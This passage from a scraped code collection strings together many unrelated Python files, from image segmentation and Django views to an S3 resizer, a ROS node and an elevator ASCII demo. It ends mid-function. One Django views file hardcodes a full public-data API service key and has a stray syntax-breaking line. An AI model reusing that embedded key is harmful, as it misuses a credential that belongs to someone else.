In[14]:\n\n\n# importing pyplot and image from matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\n \n# reading png image file\nim = img.imread('/Users/sebastianperezlopez/Desktop/5 epochs/seepageTEST5.jpg')\n \n# show image\nplt.imshow(im)\n\n\n# ## Create segmentation mask on single image using trained model for further image manipulation (no output)\n# No photo output here; instead, saving segmented mask in segmask variable\n\n# In[28]:\n\n\nimport pixellib\nfrom pixellib.instance import custom_segmentation\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\n\noriginalImage = '/Users/sebastianperezlopez/Desktop/framefolder.nosync/raw frames/_frame16500.jpg'\n\nsegment_image = custom_segmentation()\nsegment_image.inferConfig(num_classes= 1, class_names= [\"BG\", \"seepage\"])\nsegment_image.load_model('/Users/sebastianperezlopez/Desktop/PixelLabTesting/mask_rcnn_models.nosync/Epoch2_16July') # Put filename of .h5 that has weights you just trained\nsegmask, output = segment_image.segmentImage(originalImage, show_bboxes=True, extract_segmented_objects= True)\n\n\n\n# ## Isolate Mask\n\n# In[29]:\n\n\n#https://www.codespeedy.com/change-the-pixel-values-of-an-image-in-python/\n\nfrom PIL import Image\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport numpy\nfrom numpy import array\n\noutputMask = segmask['masks']\n\nimage = img.imread(originalImage)\n\nnewImage = Image.new('RGB', (image.shape[1],image.shape[0]), \"black\")\npixels = newImage.load()\n\nfor i in range(newImage.size[0]):\n for j in range(newImage.size[1]):\n if outputMask[j,i] == array([True]):\n pixels[i,j] = (255,255,255)\n if outputMask[j,i] == array([False]): \n pixels[i,j] = (0,0,0)\n \ndisplay(newImage)\n\nnewImage.save('/Users/sebastianperezlopez/Desktop/framefolder.nosync/segmented mask/_frame16500.jpg')\n\n#image.shape\n#outputMask.shape\n\n#for i in range(newImage.shape[0]):\n # for j in range(newImage.shape[1]):\n # if outputMask[i, j] == False:\n # newImage[i, j] = 0\n # else:\n # newImage[i, j] = 1\n\n\n# ## Isolate Masks' Upper Border\n\n# In[30]:\n\n\nfrom PIL import Image\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport numpy\nfrom numpy import array\n\noutputMask = segmask['masks']\n\nimage = img.imread(originalImage)\n\nnewImage = Image.new('RGB', (image.shape[1],image.shape[0]), \"black\")\npixels = newImage.load()\n\n# outputMask = mask\n# newImage = size of original image, all black. \n\n\nfor i in range(newImage.size[0]):\n j = 0\n while outputMask[j,i] == array([False]):\n j += 1\n #if j == 4677: \n if j == image.shape[0]: \n break\n if outputMask[j,i] == array([True]):\n pixels[i,j] = (255,255,255)\n pixels[i+1,j] = (255,255,255)\n pixels[i+2,j] = (255,255,255)\n pixels[i+3,j] = (255,255,255)\n pixels[i-1,j] = (255,255,255)\n pixels[i-2,j] = (255,255,255)\n pixels[i-3,j] = (255,255,255)\n break\n \n\ndisplay(newImage)\n\n\nnewImage.save('/Users/sebastianperezlopez/Desktop/framefolder.nosync/segmented border/_frame16500.jpg')\n\n\n# ## Analyze a video file and separate frames / run image segmentation on each frame.\n\n# In[ ]:\n\n\n# crop video to only tank (I found this was easiest to do on an iPhone...)\n# need cv2 (OpenCV)\n\n\n# In[18]:\n\n\nimport cv2\n\nvideo = cv2.VideoCapture(\"/Users/sebastianperezlopez/Desktop/framefolder.nosync/DSC_7166.mp4\")\ntotal_frames = video.get(cv2.CAP_PROP_FRAME_COUNT)\nprint(total_frames)\n\nfor i in range(0, 17784, 500):\n video.set(1, i)\n ret, still = video.read()\n cv2.imwrite(f'/Users/sebastianperezlopez/Desktop/framefolder.nosync/raw frames/_frame{i}.jpg', still)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"MaskRCNN.py","file_name":"MaskRCNN.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"389027471","text":"#!/usr/bin/python3\nclass Square():\n \"\"\"A class used to represent a square.\n\n Attributes:\n __size: A private int with size of Square.\n \"\"\"\n def __init__(self, size=0):\n \"\"\"Inits Square with size, pnly allowed type int > 0.\"\"\"\n try:\n if not type(size) == int:\n raise TypeError\n except TypeError as e:\n raise Exception(\"size must be an integer\") from e\n try:\n if (int(size) < 0):\n raise ValueError\n self.__size = size\n except ValueError as e:\n raise Exception(\"size must be >= 0\") from e\n","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"577773022","text":"#-*- coding: utf-8 -*-\nimport pprint, json, requests\n \nimport xml.etree.ElementTree\nfrom bs4 import BeautifulSoup\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\n# Create your views here.\n\nserviceKey = \"sYYsbAStv5lTMH32zXdixfecuB3dMciY5lyOva1NYa0rQD2odfRg82LZn%2F3QBqa%2BerqaXm28HDph%2FcPI%2BQe7Tw%3D%3D\"\n# serviceKey = URLEncoder.encode(serviceKey, \"UTF-8\")\n\ndef health(request):\n return JsonResponse({})\n# serviceKey = URLEncoder.encode(serviceKey, \"UTF-8\");\n private\n pprint.pprint(request.body)\n if request.method == 'POST':\n # nugu_body = json.loads(request.body, encoding='utf-8')\n aItem = request.POST.get(\"a\")\n bItem = request.POST.get(\"b\")\n url = f\"http://apis.data.go.kr/1470000/DURPrdlstInfoService/getUsjntTabooInfoList?ServiceKey={serviceKey}&itemName={aItem}\"\n print(url)\n responses = requests.get(url)\n response = BeautifulSoup(responses.content, 'lxml-xml')\n pprint.pprint(response)\n \n # pprint.pprint(nugu_body)\n \n else:\n return render(request, 'pills/interaction.html')\n \ndef oldmanCare(request):\n global serviceKey # 서비스 인증키 불러오기 (전역변수)\n \n # 요청변수(Request Parameter)\n typeName = \"병용금기\" # DUR 유형\n ingrName = \"클로르디아제폭시드\" # DUR 성분\n \n # DUR 품목정보 API\n # 서비스요청 URL\n url = f'http://apis.data.go.kr/1470000/DURIrdntInfoService/getOdsnAtentInfoList?ServiceKey={serviceKey}&typeName={typeName}&ingrName={ingrName}&numOfRows=3&pageNo=1'\n responses = requests.get(url)\n response = BeautifulSoup(responses.content, 'lxml-xml')\n pprint.pprint(response)\n return render(request, 'pills/oldmanCare.html', {'response': response})\n ","sub_path":"pills/.~c9_invoke_tGgs7.py","file_name":".~c9_invoke_tGgs7.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"582453812","text":"\"\"\"Phabricator client classes.\"\"\"\n\nimport requests\n\n\nclass PhabricatorClient:\n \"\"\"Simple Phabricator client.\"\"\"\n\n PRIORITY_HIGH = 75\n\n STATUS_OPEN = 'open'\n\n def __init__(self, host, api_token):\n \"\"\"Create client for specified host and api token.\"\"\"\n self.host = host\n self.api_token = api_token\n\n def api_request(self, method, params):\n \"\"\"Make api request to Phabricator.\"\"\"\n params['api.token'] = self.api_token\n r = requests.get('https://{}/api/{}'.format(self.host, method),\n params=params)\n return r.json()['result']\n\n def get_task(self, task_id):\n \"\"\"Get task by id.\"\"\"\n result = self.api_request('maniphest.search', {\n 'constraints[ids][0]': task_id\n })['data']\n\n if len(result) > 0:\n result = result[0]\n else:\n return None\n\n return PhabricatorTask.fromApiResult(self, result)\n\n def get_user(self, user_phid):\n \"\"\"Get user by phid.\"\"\"\n result = self.api_request('user.search', {\n 'constraints[phids][0]': user_phid\n })['data'][0]\n\n user = PhabricatorUser(self)\n user.username = result['fields']['username']\n return user\n\n def find_tasks(self, priorities=[], statuses=[]):\n \"\"\"Find tasks.\"\"\"\n params = {}\n\n for i in range(0, len(priorities)):\n params['constraints[priorities][' + str(i) + ']'] = priorities\n for i in range(0, len(statuses)):\n params['constraints[statuses][' + str(i) + ']'] = statuses\n\n result = self.api_request('maniphest.search', params)['data']\n tasks = []\n for entry in result:\n tasks.append(PhabricatorTask.fromApiResult(self, entry))\n return tasks\n\n\nclass PhabricatorTask:\n \"\"\"Class representing Phabricator task.\"\"\"\n\n def __init__(self, client):\n \"\"\"Create instance for client.\"\"\"\n self.client = client\n\n @staticmethod\n def fromApiResult(client, entry):\n \"\"\"Create instance and fill it with data from api request result.\"\"\"\n task = PhabricatorTask(client)\n task.id = entry.get('id')\n fields = entry.get('fields', {})\n task.title = fields.get('name')\n task.ownerPHID = fields.get('ownerPHID')\n task.authorPHID = fields.get('authorPHID')\n task.priority = fields.get('priority', {}).get('name')\n task.status = fields.get('status', {}).get('name')\n task.dateModified = fields.get('dateModified')\n return task\n\n @property\n def author(self):\n \"\"\"Get task author.\"\"\"\n if self.authorPHID is None:\n return None\n\n if not hasattr(self, '_author'):\n self._author = self.client.get_user(self.authorPHID)\n return self._author\n\n @property\n def owner(self):\n \"\"\"Get task owner/assignee.\"\"\"\n if self.ownerPHID is None:\n return None\n\n if not hasattr(self, '_owner'):\n self._owner = self.client.get_user(self.ownerPHID)\n return self._owner\n\n @property\n def link(self):\n \"\"\"Get link to the task.\"\"\"\n return \"https://{}/T{}\".format(self.client.host, self.id)\n\n\nclass PhabricatorUser:\n \"\"\"Class representing Phabricator user.\"\"\"\n\n def __init__(self, client):\n \"\"\"Create instance for client.\"\"\"\n self.client = client\n","sub_path":"modules/utils/phabricator.py","file_name":"phabricator.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"167700519","text":"# 30个 斐波那契数列\ndef create_fibonacci_series(length):\n \"\"\"\n 输入长度\n :return: 输出数列\n \"\"\"\n list_fibonacci = [1, 1]\n while len(list_fibonacci) < length:\n number = list_fibonacci[- 1] + list_fibonacci[- 2]\n list_fibonacci.append(number)\n return list_fibonacci\n\n\nlist01 = create_fibonacci_series(10)\nprint(list01)\n\n\n# 打印100以内质数\ndef prime_number(start=1, end=0):\n return [number for number in range(start, end) if check_prime_number(number)]\n\n\ndef check_prime_number(number):\n for item in range(2, number):\n if number % item == 0:\n return False\n return True\n\n\nprint(prime_number())\n","sub_path":"python_study/base02/tarnar02.py","file_name":"tarnar02.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"541810800","text":"import os\nfrom PIL import Image\nimport boto3\nfrom boto3.s3.transfer import S3Transfer\nimport tempfile\ns3 = boto3.resource('s3')\nbucket = s3.Bucket('images-from')\nclient = boto3.client('s3','ap-northeast-1')\ntransfer = S3Transfer(client)\ndir_imagesfrom = tempfile.TemporaryDirectory()\ndir_imagesto = tempfile.TemporaryDirectory()\nfor obj in bucket.objects.all():\n transfer.download_file('images-from',obj.key,dir_imagesfrom.name +'\\\\'+ obj.key)\nfor filename in os.listdir(dir_imagesfrom.name):\n img = Image.open(dir_imagesfrom.name+'\\\\'+filename)\n w, h = img.size\n img.thumbnail((w//2,h//2))\n img.save(dir_imagesto.name+'\\\\'+filename)\nfor filename in os.listdir(dir_imagesto.name):\n transfer.upload_file(dir_imagesto.name +'\\\\'+ filename,'images-to',filename)\n print('uploaded:',filename)\ndir_imagesfrom.cleanup()\ndir_imagesto.cleanup()\n\n\n\n","sub_path":"image_resize/resize_use_tempfile.py","file_name":"resize_use_tempfile.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"486935260","text":"from sinric import SinricPro, SinricProConstants\nimport asyncio\n\nAPP_KEY = ''\nAPP_SECRET = ''\nSWITCH_ID = ''\n\n\ndef power_state(device_id, state):\n print('device_id: {} state: {}'.format(device_id, state))\n return True, state\n\n\ncallbacks = {\n SinricProConstants.SET_POWER_STATE: power_state\n}\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n client = SinricPro(APP_KEY, [SWITCH_ID], callbacks,\n enable_log=False, restore_states=False, secret_key=APP_SECRET)\n loop.run_until_complete(client.connect())\n\n# To update the power state on server.\n# client.event_handler.raise_event(SWITCH_ID, SinricProConstants.SET_POWER_STATE, data = {SinricProConstants.STATE: SinricProConstants.POWER_STATE_ON })\n# client.event_handler.raise_event(SWITCH_ID, SinricProConstants.SET_POWER_STATE, data = {SinricProConstants.STATE: SinricProConstants.POWER_STATE_OFF })\n","sub_path":"examples/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"654026093","text":"from django.conf.urls import url\n\n\nfrom . import views\n\nurlpatterns = [\n url(r'^layouts/$', views.layouts, name='layouts'), \n url(r'^look/(?P[0-9]+)/$', views.look, name='look'), \n url(r'^rack_item/(?P[0-9]+)/$', views.rack_item, name='rack_item'), \n url(r'^look_item/(?P[0-9]+)/$', views.look_item, name='look_item'), \n url(r'^look_list/$', views.look_list, name='look_list'), \n url(r'^user_product_favorites/(?P[0-9]+)/$', views.user_product_favorites, name='user_product_favorites'), \n url(r'^user_product_favorite/(?P[0-9]+)/$', views.user_product_favorite, name='user_product_favorite'),\n url(r'^user_look_favorites/(?P[0-9]+)/$', views.user_look_favorites, name='user_look_favorites'), \n url(r'^user_look_favorite/(?P[0-9]+)/$', views.user_look_favorite, name='user_look_favorite'),\n url(r'^client_360/(?P[0-9]+)/$', views.client_360, name='client_360'),\n url(r'^styling_session_note/(?P[0-9]+)/$', views.styling_session_note, name='styling_session_note'),\n url(r'^styling_session_notes/(?P[0-9]+)/$', views.styling_session_notes, name='styling_session_notes'),\n url(r'^look_meta_tags/(?P[0-9]+)/$', views.look_meta_tags, name='look_meta_tags'),\n url(r'^style_occasions/$', views.style_occasions, name='style_occasions'), \n url(r'^style_type/$', views.style_type, name='style_type'), \n url(r'^update_look_position/(?P[0-9]+)/$', views.update_look_position, name='update_look_position'),\n url(r'^update_look_collage_image_data/(?P[0-9]+)/$', views.update_look_collage_image_data, name='update_look_collage_image_data'),\n url(r'^update_cropped_image_code/(?P[0-9]+)/$', views.update_cropped_image_code, name='update_cropped_image_code'),\n url(r'^get_allume_size/$', views.get_allume_size, name='get_allume_size'),\n url(r'^add_client_to_360/(?P[0-9]+)/$', views.add_client_to_360_api, name='add_client_to_360_api'),\n url(r'^add_look_to_session/(?P[0-9]+)/(?P[0-9]+)/$', views.add_look_to_session, name='add_look_to_session'),\n # sold out reporting\n url(r'^report_product_inventory_mismatch_from_anna/$', views.report_product_inventory_mismatch_from_anna, name='report_product_inventory_mismatch_from_anna'),\n url(r'^report_product_inventory_mismatch/$', views.report_product_inventory_mismatch, name='report_product_inventory_mismatch'),\n # download the look_copy report\n url(r'^look_copy_report/$', views.look_copy_report, name='look_copy_report'),\n\n]\n","sub_path":"shopping_tool_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"41345400","text":"import itertools\n\nmaze = {}\nstart = None\nlocations = []\n\nx, y = 0, 0\nfor line in open('input.txt'):\n\tfor x in range(len(line.rstrip())):\n\t\tmaze[x, y] = line[x]\n\t\tif line[x] == '0':\n\t\t\tstart = (x, y)\n\t\telif line[x] not in '#.':\n\t\t\tlocations.append((x, y))\n\n\ty += 1\n\n# BFS for shortest path\ndef getShortestPath(start, end):\n\tstates = {}\n\tsteps = 0\n\tpos = start\n\tqueue = [(pos, steps)]\n\n\twhile pos != end:\n\t\tpos, steps = queue.pop(0)\n\n\t\tif pos in states:\n\t\t\tcontinue\n\n\t\tstates[pos] = steps\n\n\t\tx, y = pos\n\n\t\tfor move in [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)]:\n\t\t\tif maze[move] != '#':\n\t\t\t\tqueue.append((move, steps + 1))\n\n\treturn steps\n\ndistances = {}\n\nfor location in locations:\n\tdistances[start, location] = getShortestPath(start, location)\n\tdistances[location, start] = distances[start, location]\n\nfor pointA, pointB in itertools.combinations(locations, 2):\n\tlength = getShortestPath(pointA, pointB)\n\n\t# store the distance in both directions for easier lookups\n\tdistances[pointA, pointB], distances[pointB, pointA] = length, length\n\nleastSteps = float('inf')\nfor path in itertools.permutations(locations, len(locations)):\n\tpath = (start,) + path + (start,)\n\tsteps = 0\n\n\tfor i in range(len(path) - 1):\n\t\tsteps += distances[path[i], path[i + 1]]\n\n\tleastSteps = min(leastSteps, steps)\n\nprint(leastSteps)\n","sub_path":"2016/day24/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"522824726","text":"n = int(input(\"Введите количество билетов:\\n\"))\nfound = 0\nfor numcount in range (n):\n tick = str(input(\"Введите номер билета/билетов:\\n\"))\n if (tick[0] == 'a') and (tick[4] == '5') and (tick[5] == '5') and (tick[6] == '6') and (tick[7] == '6') and (tick[8] == '1'):\n print(tick, end = ' ')\n break\n else:\n found += 1\nif found == n:\n print(\"-1\", end = ' ')","sub_path":"practice/16/python/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"93479505","text":"#coding=utf-8\nfun={\n \"一\":1,\n \"二\":2,\n \"三\":3,\n \"四\":4,\n \"五\":5,\n \"六\":6,\n \"七\":7,\n \"八\":8,\n \"九\":9,\n \"十\":10,\n \"十一\":11,\n \"十二\":12,\n \"十三\":13,\n \"十四\":14,\n \"十五\":15,\n \"十六\":16,\n \"十七\":17,\n \"十八\":18,\n \"十九\":19,\n \"二十\":20,\n \"二十一\":21,\n \"二十二\":22,\n \"二十三\":23,\n \"二十四\":24,\n \"二十五\":25,\n \"二十六\":26,\n \"二十七\":27,\n \"二十八\":28,\n \"二十九\":29,\n \"三十\":30,\n \"三十一\":31,\n \"三十二\":32,\n \"三十三\":33\n}\n\nimport xlrd\n#打开一个workbook\nworkbook = xlrd.open_workbook('./test.xlsx')\n#抓取所有sheet页的名称\nworksheets = workbook.sheet_names()\n#print('worksheets is %s' %worksheets)\n#定位到sheet1\nworksheet1 = workbook.sheet_by_name(u'Sheet1')\n\"\"\"\n#通过索引顺序获取\nworksheet1 = workbook.sheets()[0]\n#或\nworksheet1 = workbook.sheet_by_index(0)\n\"\"\"\n\nimport xlwt\nworkbook2 = xlwt.Workbook() #注意Workbook的开头W要大写\nsheet1 = workbook2.add_sheet('sheet1',cell_overwrite_ok=True)\n\nnum_rows = worksheet1.nrows\nfor curr_row in range(num_rows):\n row = worksheet1.row_values(curr_row)\n for index in range(len(row)):\n if(curr_row!=0 and index==1):\n sheet1.write(curr_row,index,fun[row[index]])\n else:\n sheet1.write(curr_row,index,row[index])\n\n #print(row[0],fun[row[1]],row[2])\n\nworkbook2.save('./2.xls')","sub_path":"Python/excel/xls_xlrd_xlwt.py","file_name":"xls_xlrd_xlwt.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"128325138","text":"import json\nimport requests\nimport datetime\nfrom flask import *\nfrom flask_cors import CORS\nfrom reporter.make_result import make_result\nfrom reporter.config import config\nfrom reporter.utils import logger, handle_request_exceptions\nfrom tasks import epidemic_report\n\napp_name = 'epidemic'\napp = Flask(app_name)\nCORS(app, supports_credentials=True)\nhandle_request_exceptions(app)\n\n\ndef get_apis() -> dict:\n return {\n '/': {\n \"description\": 'Index and description of the Epidemic Report API',\n 'methods': ['GET'],\n 'args': {},\n 'rets': {\n 'apis': \"Lists of API urls and args\"\n }\n },\n '/report': {\n \"description\": 'HITsz疫情上报',\n 'methods': ['GET', 'POST'],\n 'args': {\n \"username\": {\n \"description\": 'HITsz SSO登录用户名(学号)',\n \"required\": True\n },\n \"password\": {\n \"defscription\": \"HITsz SSO登录密码\",\n \"required\": True\n },\n \"api_key\": {\n \"description\": \"Server酱的SCKEY\",\n \"required\": False\n }\n }\n }\n }\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return make_result(data={\n 'description': f'HItsz-daily-reporter API v{config.data.get(\"epidemic-report-version\", None)}',\n 'apis': get_apis()\n })\n\n\n@app.route('/report/', methods=['GET', 'POST'])\ndef report():\n if request.method == 'GET':\n args = request.args\n elif request.method == 'POST':\n try:\n args = request.json\n except json.decoder.JSONDecodeError:\n return make_result(400)\n else:\n return make_result(400)\n args = json.loads(json.dumps(args))\n required = ['username', 'password']\n for r in required:\n if r not in args:\n return make_result(400, message=f'Arg {r} is required')\n is_successful, msg = epidemic_report.main(args)\n if is_successful:\n txt = f\"疫情上报成功!{datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')}\"\n else:\n txt = f\"疫情上报失败,原因:{msg}{datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')}\"\n if 'api_key' in args and not is_successful:\n requests.get(f\"https://sc.ftqq.com/{args.api_key}.send?text={txt}\")\n return make_result(code=200 if is_successful else 403, message=txt)\n","sub_path":"api/tasks/app_epidemic_report.py","file_name":"app_epidemic_report.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"360808909","text":"# !usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport requests\nimport time\nfrom lxml import etree\n\ndef get_url_json(url, headers = None):\n res = False\n while res == False:\n time.sleep(0.3)\n try:\n response = requests.get(url, headers=headers)\n res = True\n return response.json()\n except:\n print('get_url_json err,err url =', url)\n res = False\n \n\ndef get_url_html(url):\n res = False\n while res == False:\n time.sleep(0.3)\n try:\n response = requests.get(url)\n if response.status_code == 500:\n return ''\n html = etree.HTML(response.text)\n res = True\n return html\n except:\n print('get_url_html err,err url =', url)\n res = False","sub_path":"common_fun.py","file_name":"common_fun.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"385285742","text":"from node import Node, BeaconBlock, MainChainBlock, ShardCollation\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport random, time\n\n\n## This methods creates an offset for plotting blocks of the main chain,\n# the beacon chain and all the shards\n# @param b Block to be plotted\ndef mkoffset(b):\n return random.randrange(5) + \\\n (0 if isinstance(b, MainChainBlock) else\n 5 if isinstance(b, BeaconBlock) else\n 5 + 5 * b.shard_id if isinstance(b, ShardCollation) else\n None)\n\n\n## This method plots the blockchain as seen from one of the notaries\n# @param n The notarie to plot its view of the chain\ndef plotChain(n):\n G=nx.Graph()\n fileName = \"results/chain-\" + str(n.id) + \".png\"\n for b in n.blocks.values():\n if b.number > 0:\n if isinstance(b, BeaconBlock):\n G.add_edge(b.hash, b.main_chain_ref, color='c')\n G.add_edge(b.hash, b.parent_hash, color='g')\n elif isinstance(b, MainChainBlock):\n G.add_edge(b.hash, b.parent_hash, color='b')\n elif isinstance(b, ShardCollation):\n G.add_edge(b.hash, b.beacon_ref, color='r')\n G.add_edge(b.hash, b.parent_hash, color='y')\n plt.clf()\n fig = plt.figure(figsize=(18,9))\n pos={b.hash: (b.ts + mkoffset(b), b.ts) for b in n.blocks.values()}\n edges = G.edges()\n colors = [G[u][v]['color'] for u,v in edges]\n nx.draw_networkx_nodes(G, pos, node_size=10, node_shape='o', node_color='0.75')\n nx.draw_networkx_edges(G, pos, width=2, edge_color=colors)\n plt.ylabel(\"Time (ticks)\")\n plt.savefig(fileName, bbox_inches=\"tight\")\n plt.close()\n\n\n## This method plots the peer to peer network of the blockchain being\n# simulated\n# @param peers The peer to peer network to plot\n# @param dir The directory where the figure should be saved\ndef plotNetwork(peers, dir):\n plt.clf()\n G=nx.Graph()\n fig = plt.figure(figsize=(18,9))\n for peer in peers:\n G.add_node(str(peer))\n for p in peers.get(peer):\n G.add_edge(str(peer), str(p.id))\n nx.draw(G, with_labels=True)\n plt.axis(\"off\")\n plt.savefig(dir+\"/network.png\", bbox_inches=\"tight\")\n\n\n","sub_path":"lshards/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"616531572","text":"# section04-1\n# requests scrapping - Session\n\nimport requests\n\n# Activate Session\ns = requests.session()\n\nr = s.get('https://www.google.com')\n\n# response data\nprint(r.text)\n\n# Status 200,201,404.......\nprint('Status Code : {}'.format(r.status_code))\n\n# check True, False\nprint('OK? : {}'.format(r.ok))\n\ns = requests.session()\n\n# cookie Return\n\nr1 = s.get(\"https://httpbin.org/cookies\", cookies={'name' : 'seo1'})\nprint(r1.text)\n\n# cookie Set\nr2 = s.get(\"https://httpbin.org/cookies/set\", cookies={'name' : 'seo2'})\nprint(r2.text)\n\n\n# User-agent\nurl = \"https://httpbin.org\"\nheaders = {'user-agent' : 'niceman_1.0.0_win10_ram16_home_chrome'}\n\n# header request\nr3 = s.get(url, headers=headers, cookies={'name' : 'seo1'})\n# print(r3.text)\n\n# Deactivate Session\ns.close()\n\n# with -> File, DB, HTTP\nwith requests.session() as s:\n r = s.get('https://www.google.com')\n # print(r.text)\n print(r.ok)\n\n\n\n","sub_path":"section04-1.py","file_name":"section04-1.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"507616798","text":"# Create a class the displays the Elevator art and navigation (list of commands)\n\nclass View():\n building_levels = 12\n building_width = 35\n\n def intro(self, position, people):\n print(\"\\n----- THE MIGHTY ELEVATOR -----\\n\")\n print(\"People in the elevator: {} (max. 5)\\nElevator position: {}\\n\".format(people, position))\n print(self.draw_top())\n print(self.draw_levels(position, people))\n print(self.draw_bottom())\n print(self.nav())\n print(\"\\nWhat would you like to do?\")\n\n def draw_top(self):\n top1 = \"\"\n for i in range(self.building_width):\n top1 += \"_\"\n top2 = \"'\"\n for j in range(1, self.building_width-1):\n top2 += \" \"\n top2 += \"'\"\n top3 = \" '\"\n for i in range(2, self.building_width-2):\n top3 += \"_\"\n top3 += \"'\"\n return top1 + \"\\n\" + top2 + \"\\n\" + top3\n\n def draw_levels(self, position, people):\n levels = \"\"\n for i in range(self.building_levels, 0, -1):\n if i == 1 and position != 1:\n levels += \" \"*2 + \"_\" + \"||_\"*2 + \"_\"*6 + \"||_\"*2 + \"_\"*6 + \"||_\"*2\n elif i == position and position != 1:\n levels += self.draw_elevator(position, people)\n elif i == position and position == 1:\n levels += self.draw_elevator(position, people)\n else:\n levels += \" \"*3 + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \"\\n\"\n return levels\n\n def draw_bottom(self):\n line2 = \"'\"\n for j in range(1, self.building_width-1):\n line2 += \" \"\n line2 += \"'\"\n line3 = \"|\"\n for i in range(1, self.building_width-1):\n line3 += \"_\"\n line3 += \"|\"\n return line2 + \"\\n\" + line3\n\n def draw_elevator(self, position, people):\n elevator = \"\"\n if position != 1 and people == 0:\n elevator += \" \"*3 + \"|| \"*2 + \"[ ] \" + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \"\\n\"\n elif position == 1 and people == 0:\n elevator += \" \"*2 + \"_\" + \"||_\"*2 + \"[___]_\" + \"||_\"*2 + \"_\"*6 + \"||_\"*2\n elif position != 1 and people > 0:\n elevator += \" \"*3 + \"|| \"*2 + \"[ X ] \" + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \"\\n\"\n elif position == 1 and people > 0:\n elevator += \" \"*2 + \"_\" + \"||_\"*2 + \"[_X_]_\" + \"||_\"*2 + \"_\"*6 + \"||_\"*2\n return elevator\n\n def nav(self):\n return(\"\\n---- CONTROLS ----\\n\\nto X - enter a number to move to floor\\nin X - enter a number to add people to the elevator\\nout X - enter a number to remove people from the elevator\\nexit - exit the application\")\n\n def invalid_command(self):\n print(\"Please enter a valid command.\")\n print(\"\\nPress a button to refresh!\")\n user_error = input()\n\n#newele = View()\n#print(newele.draw_top())\n#print(newele.draw_levels(1, 1))\n#print(newele.draw_bottom())\n#print(newele.nav())\n","sub_path":"week-05/day-04/elevator/elevator_view.py","file_name":"elevator_view.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"511491581","text":"#!/usr/bin/env python3\n#coding: utf-8\n\nimport rospy\nfrom std_msgs.msg import String\nfrom nav_msgs.msg import Odometry\nfrom cmoon_msgs.msg import location\n\n\ndef callback(msg):\n rospy.loginfo('callback')\n ll=location()\n ll.location='living room'\n ll.x=1.0\n ll.y=2.0\n pub=rospy.Publisher('location',location,queue_size=10)\n pub.publish(ll)\n rospy.loginfo('location:{} x:{} y{}'.format(ll.location,ll.x,ll.y))\n\ndef main():\n rospy.init_node('test1')\n rospy.Subscriber('/odom',Odometry,callback)\n # pub=rospy.Publisher('location',location,queue_size=10)\n # ll=location()\n # ll.location='living room'\n # ll.x=1.0\n # ll.y=2.0\n # rate=rospy.Rate(1)\n # while not rospy.is_shutdown():\n # pub.publish(ll)\n # rospy.loginfo('location:{} x:{} y{}'.format(ll.location,ll.x,ll.y))\n # rate.sleep()\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Keyboard interrupt.\")","sub_path":"src/remake/src/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"372108632","text":"import os\nimport source\n\n\n# --- 3.4.1 Ensure TCP Wrappers is installed (Scored) ---#\n\ndef 